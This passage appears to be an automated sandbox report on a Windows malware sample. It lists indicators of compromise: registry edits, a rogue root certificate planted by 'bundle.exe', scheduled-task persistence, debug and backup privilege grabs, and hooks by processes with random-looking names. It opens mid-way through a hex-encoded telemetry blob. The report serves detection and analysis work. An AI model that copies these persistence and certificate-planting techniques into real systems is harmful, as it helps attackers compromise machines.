032207d2c205c2247657450726f7669646572466f7241757468536368656d655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472794964656e74697479506172656e744d617463685c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22526f616d696e6750726f7879496e69745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536861726564437265645265667265736846726f6d53746f72655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22526561644f6e6546726f6d43726564656e7469616c4c6973745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22435265616453796e635461736b52756e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f6d61696e4a6f696e65644f72436c6f7564446f6d61696e4a6f696e656453657373696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744164616c416363657373546f6b656e46726f6d4372656450726f76696465725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574536572766963655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574436f6e666967546f6b656e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574426c6f636b696e67536572766963655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22506f70756c617465536572766963654d61705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657441757468656e74696361746564536572766963655469636b65745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22526566726573684964656e7469746965735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765745365727669636555726c466f7246656465726174696f6e50726f7669646572416e616c797369735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225365727669636555726c5374617475735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2241637175697265536572766963655469636b6574466f724144414c5c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c2253697465735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e496e736967687473222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c22496e73696768747350616e655c22203a207b205c224576656e74735c22203a207b205c22415c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22445c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2248746d6c5072656665746368526571756573745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22535c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436163686546696c654e6f7456616c69645c22203a207b205c224576656e74466c61675c22203a20323536207d207d2c205c225375624e616d657370616365735c22203a207b205c224f66666963655c22203a207b205c224576656e74735c22203a207b205c2253797374656d616c69645c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c22496e7369676874735c22203a207b205c224576656e74735c22203a207b205c22496e73696768747350616e655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e73696768747350616e65305c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e73696768747350616e65725c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2253797374656d5c22203a207b205c224576656e74735c22203a207b205c224163746976697479715c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224163746976697479735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d207d207d2c205c22536d6172744c6f6f6b75705c22203a207b205c224576656e74735c22203a207b205c22415c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f7079466561747572654761746573315c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f7079466561747572654761746573325c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573315c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657446656174757265476174657331305c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657446656174757265476174657331315c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657446656174757265476174657331325c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657446656174757265476174657331335c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657446656174757265476174657331355c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573325c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573335c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573345c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573355c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573365c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573375c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573385c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573395c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224d5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22535c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2248746d6c5072656665746368526571756573745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c225265667265736843616368656446696c65735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22446f776e6c6f61645265736f757263655c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2241757468656e7469636174696f6e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22526573756c7447726f7570546f52656e6465725c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2253656e64576562536f636b6574526571756573745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22576562536f636b657450696e67506f6e674c6174656e63795c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22446961676e6f737469635c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c2238564d65686c6c5c22203a207b205c225375624e616d657370616365735c22203a207b205c22356b69614b3747426b7a505746675c22203a207b205c224576656e74735c22203a207b205c22373139305c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d2c205c22385c22203a207b205c225375624e616d657370616365735c22203a207b205c227a424b387872415553554e52497859484e4b55415c22203a207b205c224576656e74735c22203a207b205c22393133335c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d2c205c224f66666963655c22203a207b205c224576656e74735c22203a207b205c2253797374656d644d617463685c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c22496e7369676874735c22203a207b205c224576656e74735c22203a207b205c22536d6172744c6f6f6b75705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536d6172744c6f6f6b75705f5f5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536d6172744c6f6f6b75705f5f5f5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2253797374656d5c22203a207b205c224576656e74735c22203a207b205c2241637469766974795c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2253797374656d68633863674f6a46515c22203a207b205c224576656e74735c22203a207b205c22383635335c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d207d207d2c205c22556952756e74696d655c22203a207b205c224576656e74735c22203a207b205c22437265617465576562536f636b65745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2250726f636573735265717565737451756575655c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22496e74656e745365727669636550726f78794f6e436f6e6e656374696f6e436c6f7365645c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224f6e436f6e6e656374696f6e436c6f7365645c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4c6963656e73696e67222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c224c6963656e73696e67427573626172416374696f6e5c22203a207b205c224576656e74466c61675c22203a203439343038207d2c205c22487244697370617463685375625461736b53746172745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22517569636b56616c69646174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2253617665416c6c536b75696473546f52656769737472795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2257616974546f52657472794865617274626561745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536561726368466f7253657373696f6e546f6b656e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224e554c56616c69646174696f6e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2256616c696461746553657373696f6e546f6b656e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2243616e52756e4665617475726543616368655c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22506572666f726d4c6963656e73696e674e6f74696669636174696f6e735c22203a207b205c224576656e74466c61675c22203a20323536207d207d2c205c225375624e616d657370616365735c22203a207b205c224c5655585c22203a207b205c224576656e74735c22203a207b205c224e6f456e7469746c656d656e74735c22203a207b205c224576656e74466c61675c22203a203439343038207d2c205c224e6f456e7469746c656d656e74734578706572696d656e74547269676765725c22203a207b205c224576656e74466c61675c22203a203439343038207d207d207d2c205c224f6666 integrator.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing integrator.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed dwm.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Interface\{033D10C1-80FA-40E2-B578-A800DF9A9316} msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{033D10C1-80FA-40E2-B578-A800DF9A9316}\ProxyStubClsid msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{1E886174-DC88-4B83-8BC5-66409EC75F16}\VersionIndependentProgID msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1E886174-DC88-4B83-8BC5-66409EC75F16}\ = "Office Licensing COM Server 16" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{A4D51C5D-F8BF-46CC-92CC-2B34D2D89716}\10.0\FLAGS msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\00006109E70000000100000000F01FEC\WixSwidTag msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\00006109E70000000100000000F01FEC\OSpp msiexec.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\MuiCache StartMenuExperienceHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1E886174-DC88-4B83-8BC5-66409EC75F16}\ProgID\ = "LicLua.LicLuaObject.16" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{033D10C1-80FA-40E2-B578-A800DF9A9316}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Installer\Products\00006109E70000000100000000F01FEC msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{033D10C1-80FA-40E2-B578-A800DF9A9316}\ProxyStubClsid32 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{1E886174-DC88-4B83-8BC5-66409EC75F16}\LocalServer32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\00006109E70000000100000000F01FEC\OSppWoW64 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00006109E70000000100000000F01FEC msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A4D51C5D-F8BF-46CC-92CC-2B34D2D89716}\10.0\FLAGS\ = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\LicLua.LicLuaObject\ = "LicLua.LicLuaObject" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{1E886174-DC88-4B83-8BC5-66409EC75F16}\ProgID msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1E886174-DC88-4B83-8BC5-66409EC75F16}\TypeLib\ = "{A4D51C5D-F8BF-46CC-92CC-2B34D2D89716}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{033D10C1-80FA-40E2-B578-A800DF9A9316}\ = "ILicLua" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{033D10C1-80FA-40E2-B578-A800DF9A9316}\ProxyStubClsid32 msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A4D51C5D-F8BF-46CC-92CC-2B34D2D89716}\10.0\FLAGS msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\LicLua.LicLuaObject\CurVer msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\LicLua.LicLuaObject msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1E886174-DC88-4B83-8BC5-66409EC75F16}\VersionIndependentProgID msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{1E886174-DC88-4B83-8BC5-66409EC75F16}\Elevation msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\00006109E70000000100000000F01FEC\OSpp_Core msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A4D51C5D-F8BF-46CC-92CC-2B34D2D89716}\10.0\0 msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{033D10C1-80FA-40E2-B578-A800DF9A9316}\NumMethods msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{033D10C1-80FA-40E2-B578-A800DF9A9316}\TypeLib msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{033D10C1-80FA-40E2-B578-A800DF9A9316}\TypeLib\ = "{A4D51C5D-F8BF-46CC-92CC-2B34D2D89716}" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\00006109E70000000100000000F01FEC msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\LicLua.LicLuaObject\CLSID msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\LicLua.LicLuaObject\CurVer\ = "LicLua.LicLuaObject.16" msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{033D10C1-80FA-40E2-B578-A800DF9A9316}\ProxyStubClsid msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1E886174-DC88-4B83-8BC5-66409EC75F16}\TypeLib msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\IPjaex13M\DefaultIcon\ = "C:\\ProgramData\\IPjaex13M.ico" 1712418979.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{1E886174-DC88-4B83-8BC5-66409EC75F16}\TypeLib msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1E886174-DC88-4B83-8BC5-66409EC75F16}\Elevation\Enabled = "1" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\AppID\{1E886174-DC88-4B83-8BC5-66409EC75F16} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\00006109E70000000100000000F01FEC\AppVSubscriptionHeartbeat = "\x06" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00006109E70000000100000000F01FEC\ProductName = "Office 16 Click-to-Run Licensing Component" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\LicLua.LicLuaObject.16\CLSID\ = "{1E886174-DC88-4B83-8BC5-66409EC75F16}" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\IPjaex13M 1712418979.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00006109E70000000100000000F01FEC\SourceList msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\LicLua.LicLuaObject.16\CLSID msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1E886174-DC88-4B83-8BC5-66409EC75F16}\Elevation\IconReference = "@c:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\liclua.exe,-1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{1E886174-DC88-4B83-8BC5-66409EC75F16}\ = "Office Licensing COM Server 16" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{1E886174-DC88-4B83-8BC5-66409EC75F16}\AccessPermission = 010004807000000080000000000000001400000002005c0004000000000014000700000001010000000000050a000000000014000300000001010000000000051200000000001800070000000102000000000005200000002002000000001400070000000101000000000005040000000102000000000005200000002002000001020000000000052000000020020000 msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\LicLua.LicLuaObject\CLSID msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.IPjaex13M 1712418979.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\LicLua.LicLuaObject.16\ = "LicLua.LicLuaObject.16" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1E886174-DC88-4B83-8BC5-66409EC75F16}\LocalServer32\ = "\"c:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\LICLUA.EXE\"" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{033D10C1-80FA-40E2-B578-A800DF9A9316}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Installer\Features\00006109E70000000100000000F01FEC msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.IPjaex13M\ = "IPjaex13M" 1712418979.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{033D10C1-80FA-40E2-B578-A800DF9A9316}\NumMethods msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{033D10C1-80FA-40E2-B578-A800DF9A9316}\NumMethods\ = "4" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A4D51C5D-F8BF-46CC-92CC-2B34D2D89716}\10.0\ = "LicLuaLib" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A4D51C5D-F8BF-46CC-92CC-2B34D2D89716}\10.0\0\win64\ = "c:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\LICLUA.EXE" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Installer\Products\00006109E70000000100000000F01FEC\SourceList msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\LicLua.LicLuaObject.16\CLSID msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\LicLua.LicLuaObject\CurVer msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\LICLUA.EXE msiexec.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 4576 reg.exe 5972 reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 bundle.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 bundle.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5272 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 4644 ONENOTE.EXE 4644 ONENOTE.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3524 MSBuild.exe 3524 MSBuild.exe 3324 powershell.exe 3324 powershell.exe 3324 powershell.exe 1640 292098928.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe 2588 1712418979.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4752 tstory.exe -
Suspicious behavior: LoadsDriver 64 IoCs
pid Process 5892 Process not Found 2520 Process not Found 4144 Process not Found 3728 Process not Found 5800 Process not Found 1556 Process not Found 3772 Process not Found 1784 Process not Found 3452 Process not Found 1324 Process not Found 2180 Process not Found 4836 Process not Found 4400 Process not Found 1688 Process not Found 3528 Process not Found 5680 Process not Found 1056 Process not Found 5972 Process not Found 6096 Process not Found 2756 Process not Found 1548 Process not Found 2008 Process not Found 5240 Process not Found 2184 Process not Found 5368 Process not Found 2792 Process not Found 4660 Process not Found 1500 Process not Found 2168 Process not Found 468 Process not Found 5988 Process not Found 5440 Process not Found 4424 Process not Found 2448 Process not Found 5148 Process not Found 4084 Process not Found 5744 Process not Found 1716 Process not Found 3600 Process not Found 3380 Process not Found 4392 Process not Found 6060 Process not Found 748 Process not Found 3900 Process not Found 1088 Process not Found 3132 Process not Found 3564 Process not Found 2336 Process not Found 2076 Process not Found 4664 Process not Found 4580 Process not Found 5116 Process not Found 1980 Process not Found 5288 Process not Found 180 Process not Found 5028 Process not Found 5456 Process not Found 332 Process not Found 232 Process not Found 5328 Process not Found 3312 Process not Found 5000 Process not Found 3692 Process not Found 2436 Process not Found -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 4540 sysppvrdnvs.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3544 4363463463464363463463463.exe Token: SeDebugPrivilege 3948 file1.exe Token: SeDebugPrivilege 3524 MSBuild.exe Token: SeDebugPrivilege 3324 powershell.exe Token: SeDebugPrivilege 1640 292098928.exe Token: SeAssignPrimaryTokenPrivilege 2588 1712418979.exe Token: SeBackupPrivilege 2588 1712418979.exe Token: SeDebugPrivilege 2588 1712418979.exe Token: 36 2588 1712418979.exe Token: SeImpersonatePrivilege 2588 1712418979.exe Token: SeIncBasePriorityPrivilege 2588 1712418979.exe Token: SeIncreaseQuotaPrivilege 2588 1712418979.exe Token: 33 2588 1712418979.exe Token: SeManageVolumePrivilege 2588 1712418979.exe Token: SeProfSingleProcessPrivilege 2588 1712418979.exe Token: SeRestorePrivilege 2588 1712418979.exe Token: SeSecurityPrivilege 2588 1712418979.exe Token: SeSystemProfilePrivilege 2588 1712418979.exe Token: SeTakeOwnershipPrivilege 2588 1712418979.exe Token: SeShutdownPrivilege 2588 1712418979.exe Token: SeDebugPrivilege 2588 1712418979.exe Token: SeBackupPrivilege 2588 1712418979.exe Token: SeBackupPrivilege 2588 1712418979.exe Token: SeSecurityPrivilege 2588 1712418979.exe Token: SeSecurityPrivilege 2588 1712418979.exe Token: SeBackupPrivilege 2588 1712418979.exe Token: SeBackupPrivilege 2588 1712418979.exe Token: SeSecurityPrivilege 2588 1712418979.exe Token: SeSecurityPrivilege 2588 1712418979.exe Token: SeBackupPrivilege 2588 1712418979.exe Token: SeBackupPrivilege 2588 1712418979.exe Token: SeSecurityPrivilege 2588 1712418979.exe Token: SeSecurityPrivilege 2588 1712418979.exe Token: SeBackupPrivilege 2588 1712418979.exe Token: SeBackupPrivilege 2588 1712418979.exe Token: SeSecurityPrivilege 2588 1712418979.exe Token: SeSecurityPrivilege 2588 1712418979.exe Token: SeBackupPrivilege 2588 1712418979.exe Token: SeBackupPrivilege 2588 1712418979.exe Token: SeSecurityPrivilege 2588 1712418979.exe Token: SeSecurityPrivilege 2588 1712418979.exe Token: SeBackupPrivilege 2588 1712418979.exe Token: SeBackupPrivilege 2588 1712418979.exe Token: SeSecurityPrivilege 2588 1712418979.exe Token: SeSecurityPrivilege 2588 1712418979.exe Token: SeBackupPrivilege 2588 1712418979.exe Token: SeBackupPrivilege 2588 1712418979.exe Token: SeSecurityPrivilege 2588 1712418979.exe Token: SeSecurityPrivilege 2588 1712418979.exe Token: SeBackupPrivilege 2588 1712418979.exe Token: SeBackupPrivilege 2588 1712418979.exe Token: SeSecurityPrivilege 2588 1712418979.exe Token: SeSecurityPrivilege 2588 1712418979.exe Token: SeBackupPrivilege 2588 1712418979.exe Token: SeBackupPrivilege 2588 1712418979.exe Token: SeSecurityPrivilege 2588 1712418979.exe Token: SeSecurityPrivilege 2588 1712418979.exe Token: SeBackupPrivilege 2588 1712418979.exe Token: SeBackupPrivilege 2588 1712418979.exe Token: SeSecurityPrivilege 2588 1712418979.exe Token: SeSecurityPrivilege 2588 1712418979.exe Token: SeBackupPrivilege 2588 1712418979.exe Token: SeBackupPrivilege 2588 1712418979.exe Token: SeSecurityPrivilege 2588 1712418979.exe -
Suspicious use of FindShellTrayWindow 19 IoCs
pid Process 4752 tstory.exe 3680 chrome.exe 3680 chrome.exe 5104 wmild.exe 2292 random.exe 2292 random.exe 2292 random.exe 2292 random.exe 2292 random.exe 2292 random.exe 2292 random.exe 2292 random.exe 2292 random.exe 2292 random.exe 4956 firefox.exe 4956 firefox.exe 4956 firefox.exe 4956 firefox.exe 4752 tstory.exe -
Suspicious use of SendNotifyMessage 16 IoCs
pid Process 4752 tstory.exe 2292 random.exe 2292 random.exe 2292 random.exe 2292 random.exe 2292 random.exe 2292 random.exe 2292 random.exe 2292 random.exe 2292 random.exe 2292 random.exe 4956 firefox.exe 4956 firefox.exe 4956 firefox.exe 4956 firefox.exe 4752 tstory.exe -
Suspicious use of SetWindowsHookEx 21 IoCs
pid Process 4752 tstory.exe 3524 MSBuild.exe 4644 ONENOTE.EXE 4644 ONENOTE.EXE 4644 ONENOTE.EXE 4644 ONENOTE.EXE 4644 ONENOTE.EXE 4644 ONENOTE.EXE 4644 ONENOTE.EXE 4644 ONENOTE.EXE 4644 ONENOTE.EXE 4644 ONENOTE.EXE 4644 ONENOTE.EXE 4644 ONENOTE.EXE 4644 ONENOTE.EXE 4644 ONENOTE.EXE 2488 integrator.exe 5900 integrator.exe 4956 firefox.exe 2020 StartMenuExperienceHost.exe 2192 StartMenuExperienceHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
